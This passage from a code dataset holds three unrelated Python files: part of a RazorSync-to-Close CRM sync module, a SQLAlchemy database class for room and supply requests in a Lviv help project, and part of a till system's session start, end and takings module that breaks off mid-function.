opp['id'], data={ 'status': 'Removed From Work Order' })\n logging.info(f\"Successfully updated {opp['id']} to status Removed From Work Order\")\n except APIError as e:\n logging.error(f\"Failed to update {opp['id']}'s status to removed from work order' because {str(e)}\")\n return None\n\n## Given a Close lead's opportunities and a service item ID as input, this method tries to match\n## a Close opoortunity to a service item ID for updating via note parsing for the given ID.\ndef find_potential_close_opp_from_work_order_service_item_id(opportunities, serv_item_id):\n\n potential_opps = [i for i in opportunities if f\"Work Order Service Item ID: {serv_item_id}\" in i['note'] ]\n if potential_opps:\n return potential_opps[0]\n return None\n\n## This method finds all service items in Close given a lead and a Work Order ID.\ndef get_list_of_service_items_in_close(lead, work_order_id):\n service_item_ids = []\n for opp in lead['opportunities']:\n try:\n ## Check to see if there's a service item ID in the opp note. This is the identifier for RS opportunities. Also check to make sure the Work Order ID itself\n ## matches because a lead can have multiple work orders attached.\n if 'Work Order Service Item ID: ' in opp['note'] and opp['note'].split('Work Order Service Item ID: ')[1].split('\\n')[0].strip() and f\"Work Order ID: {work_order_id}\" in opp['note']:\n service_item_ids.append(opp['note'].split('Work Order Service Item ID: ')[1].split('\\n')[0].strip())\n except IndexError as e:\n logging.error(f\"Failed to find service item ID on {opp['id']} - {lead['id']}\")\n return service_item_ids\n\n## This method tries to update a Close opportunity when a work order service item is updated.\n## We try to find a potential opportunity by service item ID, and if we find one we format the opp_data\n## array like the opps are formatted in Close. If no potential opp is found, we post a new opportunity to the lead.\n## If an opp is found, we try to update it if the notes or value don't match.\ndef create_or_update_close_opportunity_from_service_item(serv_item, w_o, lead_data):\n potential_opp = find_potential_close_opp_from_work_order_service_item_id(lead_data['opportunities'], serv_item['Id'])\n opp_data = format_opportunity_data(serv_item, w_o)\n if not potential_opp:\n opp_data['lead_id'] = lead_data['id']\n try:\n opp = api.post('opportunity', data=opp_data)\n logging.info(f\"Successfully created new opportunity for Service Item {serv_item['Id']} - {w_o['Id']} - {opp['id']}\")\n except APIError as e:\n logging.error(f\"Failed to create new opportunity for Service Item {serv_item['Id']} - {w_o['Id']} because {str(e)}\")\n\n else:\n opp = potential_opp\n if opp['note'].strip() != opp_data['note'].strip() or opp.get('value') != opp_data.get('value'):\n try:\n if opp_data.get('date_created'):\n del opp_data['date_created']\n api.put('opportunity/' + opp['id'], data=opp_data)\n logging.info(f\"Successfully updated opportunity for Service Item {serv_item['Id']} - {opp['id']}\")\n except APIError as e:\n logging.error(f\"Failed to update opportunity for Service Item {serv_item['Id']} - {opp['id']} because {str(e)}\")\n\n## Method to find a note in Close via a work_order_id so we can properly update work order notes and\n## not create duplicates. If the note is meant to be a completed note, we look for was completed on.\n## Otherwise, we look for the pattern \"Work Order ID: IDHERE\" in the note.\ndef find_note_for_work_order_by_id(lead_id, work_order_id, was_completed=False):\n try:\n notes = []\n has_more = True\n offset = 0\n while has_more:\n resp = api.get('activity/note', params={ 'lead_id': lead_id, '_skip': offset })\n for note in resp['data']:\n if was_completed:\n if f\"Work Order ID: {work_order_id} was completed on:\" in note['note']:\n return note\n else:\n try:\n if f\"Work Order ID: {work_order_id}\" in note['note'] and not f\"Work Order ID: {work_order_id} was completed on:\" in note['note']:\n return note\n except IndexError as e:\n logging.error(f\"Failed to parse Work Order note on {lead_id} - {work_order_id} - {note['id']}\")\n offset += len(resp['data'])\n has_more = resp['has_more']\n except APIError as e:\n logging.error(f\"Failed to get notes for {lead_id} because {str(e)}\")\n return None\n\n## This method creates or updates work order notes on a lead for a synced work order\ndef create_or_update_close_work_order_notes(serv_items, w_o, lead_data):\n ## Create \"was completed\" note on the lead.\n if w_o['StatusName'] == 'Complete' and not find_note_for_work_order_by_id(lead_id=lead_data['id'], work_order_id=w_o['Id'], was_completed=True):\n note_data = format_note_data(work_order=w_o, was_completed=True)\n note_data['lead_id'] = lead_data['id']\n api.post('activity/note', data=note_data)\n\n ## For any Work Order update, try to find the work order not that was previously created. If not, create one.\n\n potential_note = find_note_for_work_order_by_id(lead_id=lead_data['id'], work_order_id=w_o['Id'])\n note_data = format_note_data(work_order=w_o, was_completed=False, service_items=serv_items)\n if not potential_note:\n note_data['lead_id'] = lead_data['id']\n try:\n api.post('activity/note', data=note_data)\n except APIError as e:\n logging.error(f\"Failed to post note to {note_data['lead_id']} because {str(e)}\")\n else:\n if potential_note['note'].strip() != note_data['note'].strip():\n try:\n if note_data.get('date_created'):\n del note_data['date_created']\n api.put('activity/note/' + potential_note['id'], data=note_data)\n except APIError as e:\n logging.error(f\"Failed to update note {potential_note['id']} because {str(e)}\")\n\n## Method to sync RS Work Order statuses to statuses in Close based on a list of RS statuses defined below\ndef find_work_order_statuses_in_close(work_order_statuses):\n try:\n opportunity_statuses = api.get(f\"organization/{org_id}\", params={ '_fields': 'opportunity_statuses'})['opportunity_statuses']\n status_names_in_close = [i['label'] for i in opportunity_statuses]\n if 'Removed From Work Order' not in status_names_in_close:\n try:\n api.post('status/opportunity', data={ 'label': 'Removed From Work Order', 'type': 'lost' })\n except APIError as e:\n logging.error(f'Failed to Create Removed From Work Order Status because {str(e)}')\n\n for work_order_status in work_order_statuses:\n if work_order_status['Name'] not in status_names_in_close:\n status_data = { 'label': work_order_status['Name']}\n status_data['type'] = 'active'\n if 'Complete' in status_data['label']:\n status_data['type'] = 'won'\n elif 'No ' in status_data['label'] or 'cancelled' in status_data['label'].lower():\n status_data['type'] = 'lost'\n try:\n api.post('status/opportunity', data=status_data)\n except APIError as e:\n logging.error(f\"Failed to post status to Close {status_data['label']} because {str(e)}\")\n except Exception as e:\n logging.error(f\"Failed to sync Work Order Statuses to Close because {str(e)}\")\n\n##############################################\n# RazorSync Methods\n##############################################\naddress_types = {}\nwork_order_statuses = {}\nservice_item_dictionary = {}\nrs_users_dictionary = {}\n\n# Initiate RazorSync Request Headers\nrazorsync_headers = {\n \"Host\": f\"{os.environ.get('RAZORSYNC_SERVERNAME').lower()}.0.razorsync.com\",\n \"Token\": f\"{os.environ.get('RAZORSYNC_TOKEN')}\",\n \"Content-type\": 'application/json',\n \"ServerName\": f\"{os.environ.get('RAZORSYNC_SERVERNAME')}\"\n}\n\n# Method to make request to RazorSync API\ndef make_rs_request(method, url_path, params={}, data=None):\n url = f\"https://{os.environ.get('RAZORSYNC_SERVERNAME').lower()}.0.razorsync.com/ApiService.svc/{url_path}\"\n if method.lower() == 'post':\n r = requests.post(url, headers=razorsync_headers, data=json.dumps(data))\n if r.status_code >= 400:\n logging.error(f\"Failed to complete POST for RS Path {url_path}\")\n return [] if 'List' in url_path else []\n try:\n r.json()\n return r.json()\n except Exception as e:\n logging.error(f\"Failed post request to {url_path} because {str(e)}\")\n logging.error(f\"Url: {url}\\nHeaders: {razorsync_headers}\\nData: {data}\")\n return None\n\n\n if method.lower() == 'get':\n r = requests.get(url, headers=razorsync_headers, params=params)\n if r.status_code >= 400:\n logging.error(f\"Failed to complete GET for RS Path {url_path}\")\n return [] if 'List' in url_path else {}\n try:\n r.json()\n return r.json()\n except Exception as e:\n logging.error(f\"Failed get request to {url_path} because {str(e)}\")\n logging.error(f\"{r.text}\")\n return None\n\n# This method gets the address types and work order statuses of the RazorSync organization\n# It also makes sure all work order statuses are correctly reflected in Close\ndef get_settings_models():\n try:\n settings_resp = make_rs_request(method=\"GET\", url_path='Settings')\n for k in settings_resp['AddressTypeModels']:\n address_types[k['Id']] = k['Name']\n\n for k in settings_resp['Users']:\n rs_users_dictionary[k['Id']] = f\"{k.get('FirstName') or ''} {k.get('LastName') or ''}\".strip()\n\n ## Make sure all work order statuses are in Close\n find_work_order_statuses_in_close(settings_resp['WorkOrderCustomStatuses'])\n for k in settings_resp['WorkOrderCustomStatuses']:\n work_order_statuses[k['Id']] = k['Name']\n except Exception as e:\n logging.error(f\"Could not get RS Settings Models because {str(e)}\")\n\n# This method gets all the possible service items in the RazorSync organization\ndef get_service_item_dictionary():\n service_items = make_rs_request(method='GET', url_path='ServiceItem/List')\n for k in service_items:\n service_item_dictionary[k['Id']] = k\n\n## This method gets every service item for a work_order_id\ndef get_service_items_for_work_order_id(work_order_id):\n work_order_service_items = make_rs_request(method='GET', url_path=f'WorkOrderServiceItem/List/{work_order_id}')\n for work_order_service_item in work_order_service_items:\n if work_order_service_item['ServiceItemId'] not in service_item_dictionary:\n get_service_item_dictionary()\n if work_order_service_item['ServiceItemId'] in service_item_dictionary:\n work_order_service_item['specifics'] = service_item_dictionary[work_order_service_item['ServiceItemId']]\n return work_order_service_items\n\n## This method finds an address_id based on a service_request_id from a work_order\ndef find_address_id_using_service_request_id(service_request_id):\n if service_request_id:\n service_request = make_rs_request(method=\"GET\", url_path=f\"ServiceRequest/{service_request_id}\")\n return service_request['AddressId']\n return None\n\n## This method processes work order updates where applicable.\ndef process_work_order_updates(work_order, recently_found_leads):\n if (work_order['StatusId'] not in work_order_statuses) or (work_order.get('FieldWorkerId') and work_order['FieldWorkerId'] not in rs_users_dictionary):\n get_settings_models()\n work_order['StatusName'] = work_order_statuses.get(work_order['StatusId'])\n work_order['WorkerName'] = rs_users_dictionary.get(work_order['FieldWorkerId'], \"\") if work_order.get('FieldWorkerId') else \"No Technician Yet\"\n address_id = find_address_id_using_service_request_id(work_order['ServiceRequestId'])\n if not address_id:\n return None\n if recently_found_leads.get(address_id):\n lead = recently_found_leads[address_id]\n else:\n lead = find_close_lead_from_rs_address_id(address_id)\n ## Implement SMS if address doesn't exist for work order\n if not lead:\n return None\n service_items = get_service_items_for_work_order_id(work_order['Id'])\n close_service_item_ids = get_list_of_service_items_in_close(lead, work_order['Id'])\n current_work_order_service_item_ids = [str(i.get('Id')) for i in service_items]\n removed_service_items = [i for i in close_service_item_ids if str(i) not in current_work_order_service_item_ids]\n for service_item in service_items:\n create_or_update_close_opportunity_from_service_item(service_item, work_order, lead)\n create_or_update_close_work_order_notes(service_items, work_order, lead)\n for serv_id in removed_service_items:\n update_deleted_service_item_to_deleted(serv_id, lead['opportunities'])\n\n# Start Timezone Capped Search of RS. This is a job that runs on AP Scheduler\ndef search_in_rs():\n leads_found_this_search = {}\n current_time = int(time.time()*1000)\n last_sync_time = get_sync_time_from_close(current_time)\n mod_dates = { \"FromModifiedDate\": f\"/Date({last_sync_time})/\", \"ToModifiedDate\": f\"/Date({current_time})/\" }\n customer_list = make_rs_request(method='POST', url_path=\"Customer/List\", data=mod_dates)\n if customer_list:\n for customer in customer_list:\n for address in customer['Addresses']:\n if address_types.get(address['AddressTypeId'], \"No Type\") != \"Billing\":\n lead = find_or_create_close_address_lead_from_customer(address, customer)\n leads_found_this_search[address['Id']] = lead\n logging.info(f\"Found, created, or updated leads for {customer_list.index(customer) + 1} of {len(customer_list)}\")\n \n work_orders = make_rs_request(method='POST', url_path=\"WorkOrder/List\", data=mod_dates)\n for order in work_orders:\n process_work_order_updates(order, leads_found_this_search)\n logging.info(f\"Proccessed Work Order {work_orders.index(order) + 1} of {len(work_orders)}: {order['Id']}\")\n leads_found_this_search = {}\n set_sync_time_in_close(current_time)\n logging.info(f\"Ran sync between {convert_epoch_to_dt(last_sync_time, '%x %I:%M:%S %p')} - {convert_epoch_to_dt(current_time, '%x %I:%M:%S %p')}\")\n\nget_settings_models()\nget_service_item_dictionary()\n","repo_name":"thesixtium/ServiceTitanAPI","sub_path":"custom-razorsync-integration-master/app/methods.py","file_name":"methods.py","file_ext":"py","file_size_in_byte":22188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"5607268864","text":"import psycopg2\nfrom sqlalchemy import create_engine, Column, Integer, String, Boolean\nfrom sqlalchemy.exc import SQLAlchemyError\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import sessionmaker\n\n\nclass DatabaseError(Exception):\n def __init__(self, msg):\n self.msg = msg\n super().__init__(msg)\n\n def __repr__(self):\n return f'Database Error: {self.msg}'\n\n\nclass Database:\n def __init__(self, connection_string):\n self.engine = self.init_engine(connection_string)\n self.engine.pool_timeout = 60\n self.Session = sessionmaker(bind=self.engine)\n\n def __del__(self):\n self.engine.dispose()\n\n @staticmethod\n def init_engine(connection_string):\n try:\n engine = create_engine(connection_string, connect_args={\"sslmode\": \"disable\"})\n engine.connect()\n return engine\n except psycopg2.OperationalError as e:\n raise DatabaseError(f'Error with the connection to the database: {str(e)}')\n\n def get_number_of_requests(self, table_class):\n if not DeclarativeBase.__subclasscheck__(table_class):\n raise DatabaseError(f'Table {table_class.__name__} does not exists')\n session = self.Session()\n try:\n return session.query(table_class).filter(table_class.opened).count()\n except SQLAlchemyError as e:\n raise DatabaseError(f'Error while counting requests: {str(e)}')\n finally:\n session.close()\n\n def get_room_requests(self):\n session = self.Session()\n try:\n return session.query(RoomRequest).filter(RoomRequest.opened).all()\n except SQLAlchemyError as e:\n raise DatabaseError(f'Error while getting room requests: {str(e)}')\n finally:\n session.close()\n\n def set_room_request(self, room_request):\n session = self.Session()\n try:\n session.add(room_request)\n session.commit()\n except SQLAlchemyError as e:\n session.rollback()\n raise DatabaseError(f'Error while adding new room request: {str(e)}')\n finally:\n session.close()\n\n def get_supply_requests(self):\n session = self.Session()\n try:\n return session.query(SupplyRequest).filter(SupplyRequest.opened).all()\n except SQLAlchemyError as e:\n raise DatabaseError(f'Error while getting supply requests: {str(e)}')\n finally:\n session.close()\n\n def set_supply_request(self, supply_request):\n session = self.Session()\n try:\n session.add(supply_request)\n session.commit()\n except SQLAlchemyError as e:\n session.rollback()\n raise DatabaseError(f'Error while adding new supply request: {str(e)}')\n finally:\n session.close()\n\n def remove_room_request(self, request_id):\n session = self.Session()\n try:\n room_request = session.query(RoomRequest).filter(RoomRequest.id == request_id).one()\n room_request.opened = False\n session.commit()\n except SQLAlchemyError as e:\n session.rollback()\n raise DatabaseError(f'Error while removing room request with id {request_id}: {str(e)}')\n finally:\n session.close()\n\n def remove_supply_request(self, request_id):\n session = self.Session()\n try:\n room_request = session.query(SupplyRequest).filter(SupplyRequest.id == request_id).one()\n room_request.opened = False\n session.commit()\n except SQLAlchemyError as e:\n session.rollback()\n raise DatabaseError(f'Error while removing supply request with id {request_id}: {str(e)}')\n finally:\n session.close()\n\n\nDeclarativeBase = declarative_base()\n\n\nclass RoomRequest(DeclarativeBase):\n __tablename__ = 'room_requests'\n\n id = Column(Integer, primary_key=True)\n contacts = Column('contacts', String) # application's contact (Elena, +7XXX...)\n timestamp = Column('timestamp', String)\n peoples_count = Column('peoples_count', Integer) # how many people?\n how_long_in_lviv = Column('how_long_in_lviv', String) # how long in lviv?\n opened = Column('days_in_room', Boolean, unique=False, default=True) # is the application opened?\n\n def __repr__(self):\n return ''.format(self.id)\n\n\nclass SupplyRequest(DeclarativeBase):\n __tablename__ = 'supply_requests'\n\n id = Column(Integer, primary_key=True)\n timestamp = Column('timestamp', String)\n contacts = Column('contacts', String) # application's contact (Elena, +7XXX...)\n subject = Column('peoples_count', String) # application's comment\n opened = Column('days_in_room', Boolean, unique=False, default=True) # is the application opened?\n\n def __repr__(self):\n return ''.format(self.id)\n","repo_name":"Egorich42/lviv_help","sub_path":"lviv_help/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":5009,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"25458360713","text":"\"\"\"Starting, ending, and recording totals for sessions.\"\"\"\n\nfrom . import ui, keyboard, td, printer, tillconfig, user, managestock\nfrom . import payment\nfrom . import config\nfrom .models import PayType, Session, SessionTotal, Transaction, zero\nfrom sqlalchemy.orm import undefer\nfrom sqlalchemy.sql import select, func, desc\nfrom .plugins import InstancePluginMount\nfrom decimal import Decimal\nimport datetime\n\nimport logging\nlog = logging.getLogger(__name__)\n\n\nsessiontotal_print = config.BooleanConfigItem(\n 'core:sessiontotal_print', True, display_name=\"Print session totals?\",\n description=\"Should session totals be printed after they have been \"\n \"confirmed?\")\n\n\ndef trans_restore():\n \"\"\"Restore deferred transactions\n\n Moves deferred transactions to the current session. Returns a\n list of transactions that were deferred.\n \"\"\"\n sc = Session.current(td.s)\n if sc is None:\n return []\n deferred = td.s.query(Transaction)\\\n .filter(Transaction.sessionid == None)\\\n .all()\n for i in deferred:\n i.session = sc\n td.s.flush()\n return deferred\n\n\nclass ssdialog(ui.dismisspopup):\n \"\"\"Session start dialog box.\"\"\"\n def __init__(self):\n super().__init__(9, 63, title=\"Session date\",\n colour=ui.colour_input,\n dismiss=keyboard.K_CLEAR)\n self.win.drawstr(\n 2, 2, 59, \"Please check the session date, and correct it \"\n \"if necessary.\")\n self.win.drawstr(\n 4, 2, 59, \"Press Cash/Enter to continue and start the session.\")\n self.win.drawstr(6, 2, 14, \"Session date: \", align=\">\")\n date = datetime.datetime.now()\n if date.hour >= 23:\n date = date + datetime.timedelta(days=1)\n self.datefield = ui.datefield(6, 16, f=date, keymap={\n keyboard.K_CASH: (self.key_enter, None)})\n self.datefield.focus()\n\n def key_enter(self):\n date = self.datefield.read()\n if date is None:\n ui.infopopup([\"You must enter a valid date. Every session is \"\n \"recorded against a particular date; this is to \"\n \"ensure the money taken is all recorded on that \"\n \"day even if the session finishes late.\"],\n title=\"Error\")\n return\n self.dismiss()\n sc = Session(date)\n td.s.add(sc)\n td.s.flush()\n deferred = trans_restore()\n td.foodorder_reset()\n log.info(\"Started session number %d\", sc.id)\n user.log(f\"Started session {sc.logref}\")\n payment.notify_session_start(sc)\n printer.kickout()\n if deferred:\n deferred = [\n \"\",\n \"The following deferred transactions were restored:\",\n \"\"] + [f\"{d.id} — {d.notes}\" if d.notes else\n f\"{d.id}\" for d in deferred]\n ui.infopopup([f\"Started session number {sc.id}.\"] + deferred,\n title=\"Session started\", colour=ui.colour_info,\n dismiss=keyboard.K_CASH)\n\n\n@user.permission_required(\"start-session\", \"Start a session\")\ndef start():\n \"\"\"Start a session if there is not already one in progress.\n \"\"\"\n sc = Session.current(td.s)\n if sc:\n log.info(\"Start session: session %d still in progress\", sc.id)\n ui.infopopup(\n [f\"There is already a session in progress (number {sc.id}, \"\n f\"started {sc.starttime:%H:%M on %A}).\"],\n title=\"Error\")\n else:\n ssdialog()\n\n\ndef checkendsession():\n sc = Session.current(td.s)\n if sc is None:\n log.info(\"End session: no session in progress\")\n ui.infopopup([\"There is no session in progress.\"], title=\"Error\")\n return\n if sc.incomplete_transactions:\n log.info(\"End session: there are incomplete transactions\")\n ui.infopopup(\n [\"There are incomplete transactions. After dismissing \"\n \"this message, use the 'Recall Trans' button to find \"\n \"them, and either complete them, cancel them \"\n \"or defer them.\"],\n title=\"Error\")\n return\n return sc\n\n\ndef confirmendsession():\n r = checkendsession()\n if not r:\n return\n # Check that the printer has paper before ending the session\n pp = printer.driver.offline()\n if pp:\n ui.infopopup([\"Could not end the session: there is a problem with \"\n f\"the printer: {pp}\"], title=\"Printer problem\")\n return\n r.endtime = datetime.datetime.now()\n log.info(\"End of session %d confirmed.\", r.id)\n user.log(f\"Ended session {r.logref}\")\n ui.infopopup([f\"Session {r.id} has ended.\",\n \"\",\n \"Please count the cash in the drawer and enter the \"\n \"actual amounts using management option 1, 3.\"],\n title=\"Session Ended\", colour=ui.colour_info,\n dismiss=keyboard.K_CASH)\n ui.toast(\"Printing the countup sheet.\")\n with ui.exception_guard(\"printing the session countup sheet\",\n title=\"Printer error\"):\n printer.print_sessioncountup(r)\n printer.kickout()\n managestock.stock_purge_internal(source=\"session end\")\n payment.notify_session_end(r)\n\n\n@user.permission_required(\"end-session\", \"End a session\")\ndef end():\n \"\"\"End the current session if there is one.\n \"\"\"\n r = checkendsession()\n if r:\n km = {keyboard.K_CASH: (confirmendsession, None, True)}\n log.info(\"End session popup: asking for confirmation\")\n ui.infopopup([\"Press Cash/Enter to confirm you want to end \"\n f\"session number {r.id}.\"], title=\"Session End\",\n keymap=km, colour=ui.colour_confirm)\n\n\ndef sessionlist(cont, paidonly=False, unpaidonly=False, closedonly=False,\n maxlen=None):\n \"\"\"Return a list of sessions suitable for a menu.\n \"\"\"\n q = td.s.query(Session)\\\n .order_by(desc(Session.id))\\\n .options(undefer('total'))\n if paidonly:\n q = q.filter(select([func.count(SessionTotal.sessionid)],\n whereclause=SessionTotal.sessionid == Session.id)\n .correlate(Session.__table__).as_scalar() != 0)\n if unpaidonly:\n q = q.filter(select([func.count(SessionTotal.sessionid)],\n whereclause=SessionTotal.sessionid == Session.id)\n .correlate(Session.__table__).as_scalar() == 0)\n if closedonly:\n q = q.filter(Session.endtime != None)\n if maxlen:\n q = q[:maxlen]\n f = ui.tableformatter(' r l r ')\n return [(f(x.id, x.date, tillconfig.fc(x.total)), cont, (x.id,))\n for x in q]\n\n\nclass _PMWrapper:\n \"\"\"Payment method wrapper for record session takings popup.\n\n Remembers the total and where to put it when it's updated.\n \"\"\"\n def __init__(self, paytype_id, till_total, popup):\n self.paytype_id = paytype_id\n pt = td.s.query(PayType).get(paytype_id)\n self.description = pt.description\n self.total_fields = pt.driver.total_fields\n self.lines = 1 if len(self.total_fields) <= 1 \\\n else len(self.total_fields) + 1\n self.till_total = till_total\n self.actual_total = zero\n self.fees = zero\n self.total_valid = False\n self.total_problem = \"\"\n self.fields = []\n self.popup = popup\n\n def create_total_labels(self, y):\n self.total_label = ui.label(\n y, self.popup.atx, self.popup.ffw, align=\">\")\n self.fees_label = ui.label(\n y, self.popup.ftx, self.popup.ffw, align=\">\")\n\n def display_total(self):\n if self.total_valid:\n self.total_label.set(tillconfig.fc(self.actual_total))\n self.fees_label.set(tillconfig.fc(self.fees))\n else:\n self.total_label.set(\"Error\", colour=ui.colour_error)\n self.fees_label.set(\"Error\", colour=ui.colour_error)\n\n def update_total(self):\n pt = td.s.query(PayType).get(self.paytype_id)\n try:\n self.actual_total, self.fees = pt.driver.total(\n self.popup.sessionid, [f.f for f in self.fields])\n self.total_valid = True\n self.total_problem = \"\"\n except Exception as e:\n self.actual_total = zero\n self.total_valid = False\n self.total_problem = str(e)\n self.display_total()\n self.popup.update_total()\n\n\nclass record(ui.dismisspopup):\n \"\"\"Record the takings for a session.\n\n This popup queries all the payment methods to find out which\n fields need to be displayed.\n\n Pass a Session ID to this class.\n \"\"\"\n ttx = 30\n atx = 45\n ftx = 60\n ff = \"{:>13}\"\n ffw = 13\n\n def __init__(self, sessionid):\n log.info(\"Record session takings popup: session %d\", sessionid)\n self.sessionid = sessionid\n s = td.s.query(Session).get(sessionid)\n if not self.session_valid(s):\n return\n for i in SessionHooks.instances:\n if i.preRecordSessionTakings(s.id):\n return\n paytotals = dict(s.payment_totals)\n payment_methods = td.s.query(PayType)\\\n .filter(PayType.mode != \"disabled\")\\\n .order_by(PayType.order, PayType.paytype)\\\n .all()\n # Check that all payment methods are correctly configured\n for pm in payment_methods:\n if not pm.driver.config_valid:\n ui.infopopup(\n [f\"The {pm.description} payment method is not configured \"\n f\"correctly.\",\n \"\",\n f\"The problem is: {pm.driver.config_problem}\"],\n title=\"Error\")\n return\n self.pms = [\n _PMWrapper(pt.paytype, paytotals.get(pt, zero), self)\n for pt in payment_methods]\n self.till_total = s.total\n # How tall does the window need to be? Each payment type\n # takes a minimum of one line; if len(pt.total_fields()) > 1\n # then it takes len(pt.total_fields()) + 1 lines\n h = sum(pm.lines for pm in self.pms)\n # We also need the top border (2), a prompt and header at the\n # top (3) and a total and button at the bottom (4) and the\n # bottom border (2).\n h = h + 11\n super().__init__(h, 75, title=f\"Session {s.id}\",\n colour=ui.colour_input)\n self.win.drawstr(\n 2, 2, 56, f\"Please enter the actual takings for session {s.id}.\")\n self.win.drawstr(4, self.ttx, self.ffw, \"Till total:\", align=\">\")\n self.win.drawstr(4, self.atx, self.ffw, \"Actual total:\", align=\">\")\n self.win.drawstr(4, self.ftx, self.ffw, \"Fees:\", align=\">\")\n y = 5\n self.fl = []\n for pm in self.pms:\n pm.create_total_labels(y)\n self.win.drawstr(\n y, self.ttx, self.ffw, tillconfig.fc(pm.till_total),\n align=\">\")\n self.win.drawstr(y, 2, 18, f\"{pm.description}:\")\n if len(pm.total_fields) == 0:\n # No data entry; just the description\n pm.fields = []\n elif len(pm.total_fields) == 1:\n # Single field using the description with no indent\n field = pm.total_fields[0]\n f = ui.editfield(y, 20, 8, validate=field[1])\n self.fl.append(f)\n pm.fields.append(f)\n f.sethook = pm.update_total\n else:\n # Line with payment method description and totals, then\n # one line per field with indent\n for field in pm.total_fields:\n y = y + 1\n self.win.drawstr(y, 4, 16, f\"{field[0]}:\")\n f = ui.editfield(y, 20, 8, validate=field[1])\n self.fl.append(f)\n pm.fields.append(f)\n f.sethook = pm.update_total\n y = y + 1\n y = y + 1\n self.total_y = y\n self.total_label = ui.label(self.total_y, 2, self.ttx - 4)\n # Draw the till total now, because it doesn't change\n self.win.clear(self.total_y, self.ttx, 1, self.ffw,\n colour=ui.colour_confirm)\n self.win.drawstr(\n self.total_y, self.ttx, self.ffw,\n tillconfig.fc(self.till_total), colour=ui.colour_confirm,\n align=\">\")\n self.total_amount = ui.label(\n self.total_y, self.atx, self.ffw, align=\">\")\n self.fees_amount = ui.label(\n self.total_y, self.ftx, self.ffw, align=\">\")\n y = y + 2\n self.fl.append(ui.buttonfield(y, 27, 21, 'Record'))\n ui.map_fieldlist(self.fl)\n # Override key bindings for first/last fields\n self.fl[0].keymap[keyboard.K_CLEAR] = (self.dismiss, None)\n self.fl[-1].keymap[keyboard.K_CASH] = (self.finish, None)\n self.fl[0].focus()\n for pm in self.pms:\n pm.update_total()\n\n def update_total(self):\n \"\"\"A payment method wrapper has changed its total.\n\n Redraw the total line at the bottom of the window.\n \"\"\"\n if False in (pm.total_valid for pm in self.pms):\n self.total_label.set(\"Can't calculate total\",\n colour=ui.colour_error)\n self.total_amount.set(\"Error\", colour=ui.colour_error)\n self.fees_amount.set(\"Error\", colour=ui.colour_error)\n return\n total = sum(pm.actual_total for pm in self.pms)\n fees = sum(pm.fees for pm in self.pms)\n difference = self.till_total - total\n description = \"Total (DOWN by {})\"\n if difference == zero:\n description = \"Total (correct)\"\n elif difference < zero:\n difference = -difference\n description = \"Total (UP by {})\"\n colour = ui.colour_error if difference > Decimal(20) \\\n else ui.colour_input\n self.total_label.set(\n description.format(tillconfig.fc(difference)),\n colour=colour)\n self.total_amount.set(\n tillconfig.fc(total),\n colour=ui.colour_confirm)\n self.fees_amount.set(\n tillconfig.fc(fees),\n colour=ui.colour_confirm)\n\n @staticmethod\n def session_valid(session):\n \"\"\"Is the session eligible to have its totals recorded?\n\n The session object is assumed to be in the current ORM\n session.\n\n Returns True if the session is still valid, otherwise pops up\n an error dialog and returns False.\n \"\"\"\n if session.endtime is None:\n ui.infopopup([f\"Session {session.id} is not finished.\"],\n title=\"Error\")\n return False\n if session.actual_totals:\n ui.infopopup([f\"Session {session.id} has already had totals \"\n \"recorded.\"], title=\"Error\")\n return False\n return True\n\n def finish(self):\n session = td.s.query(Session).get(self.sessionid)\n if not self.session_valid(session):\n return\n for pm in self.pms:\n if not pm.total_valid:\n ui.infopopup(\n [f\"The {pm.description} payment method can't \"\n f\"supply an actual total at the moment.\", \"\",\n f\"Its error message is: {pm.total_problem}\", \"\",\n \"Please try again later.\"],\n title=\"Payment method error\")\n return\n for pm in self.pms:\n pt = td.s.query(PayType).get(pm.paytype_id)\n td.s.add(SessionTotal(\n session=session, paytype=pt, amount=pm.actual_total,\n fees=pm.fees))\n td.s.flush()\n user.log(f\"Recorded totals for session {session.logref}\")\n for pm in self.pms:\n pt = td.s.query(PayType).get(pm.paytype_id)\n r = pt.driver.commit_total(self.sessionid, pm.actual_total, pm.fees)\n if r is not None:\n td.s.rollback()\n ui.infopopup(\n [f\"Totals not recorded: {pm.description} payment \"\n f\"method says {r}\"],\n title=\"Payment method error\")\n return\n self.dismiss()\n for i in SessionHooks.instances:\n i.postRecordSessionTakings(session.id)\n if sessiontotal_print():\n ui.toast(\"Printing the confirmed session totals.\")\n with ui.exception_guard(\"printing the confirmed session totals\",\n title=\"Printer error\"):\n printer.print_sessiontotals(session.id)\n else:\n ui.toast(f\"Totals for session {session.id} confirmed.\")\n\n\n@user.permission_required('record-takings', \"Record takings for a session\")\ndef recordtakings():\n m = sessionlist(record, unpaidonly=True, closedonly=True)\n if len(m) == 0:\n log.info(\"Record takings: no sessions available\")\n ui.infopopup([\"Every session has already had its takings \"\n \"recorded. If you want to record takings for \"\n \"the current session, you must close it first.\"],\n title=\"Error\")\n else:\n log.info(\"Record takings: displaying menu\")\n ui.menu(m, title=\"Record Takings\",\n blurb=\"Select the session that you \"\n \"want to record the takings for, and press Cash/Enter.\")\n\n\ndef totalpopup(sessionid):\n \"\"\"Display popup session totals given a Session ID.\n \"\"\"\n s = td.s.query(Session).get(sessionid)\n log.info(\"Totals popup for session %d\", s.id)\n\n # All PayTypes\n all_pts = td.s.query(PayType)\\\n .order_by(PayType.order, PayType.paytype)\\\n .all()\n # list of (Dept, total) tuples\n depts = s.dept_totals\n # dict of {PayType: total} for transactions\n paytotals = dict(s.payment_totals)\n # dict of {PayType: SessionTotal} for actual amounts paid\n payments = {x.paytype: x for x in s.actual_totals}\n l = []\n l.append(f\" Accounting date {s.date} \")\n l.append(f\" Started {s.starttime:%Y-%m-%d %H:%M:%S} \")\n if s.endtime is None:\n l.append(\" Session is still open. \")\n else:\n l.append(f\" Ended {s.endtime:%Y-%m-%d %H:%M:%S} \")\n l.append(\"\")\n tf = ui.tableformatter(\" l pr r \")\n l.append(tf(\"\", \"Till:\", \"Actual:\"))\n ttt = zero\n att = zero\n for pt in all_pts:\n till_total = paytotals.get(pt, zero)\n ttt += till_total\n actual_total = payments[pt].amount if pt in payments else zero\n att += actual_total\n if till_total or actual_total:\n l.append(tf(pt.description + \":\",\n tillconfig.fc(till_total) if till_total else \"\",\n tillconfig.fc(actual_total) if actual_total else \"\"))\n 